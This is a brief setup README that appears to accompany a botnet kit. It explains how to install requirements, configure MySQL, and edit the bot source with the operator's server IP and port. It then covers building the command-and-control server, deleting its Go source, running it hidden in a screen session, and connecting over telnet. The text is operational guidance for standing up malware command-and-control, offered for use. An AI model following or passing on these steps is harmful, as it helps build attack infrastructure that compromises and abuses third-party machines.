note: the build sh and whatnot are in tools/

Install requirements: bash getreqs.sh
Setup MySQL: go run setupsql.go (bug: you have to manually set a sql password bc blank password doesn't work.)

sql cmds:
ALTER USER 'root'@'localhost' IDENTIFIED BY 'mYs3cUreP$ssword';
flush privileges;
exit;

edit bot/main.c (line 449-450) with your actual botport & server ip
and edit cnc/config.json

Go to C&C: cd ~/cnc, Build: go build && rm -rf *.go
Start C&C: screen -dmS cnc ./cnc
Connect C2: telnet <your server ip> 38241 (change port if needed)

Enjoy! If needed, contact me for help.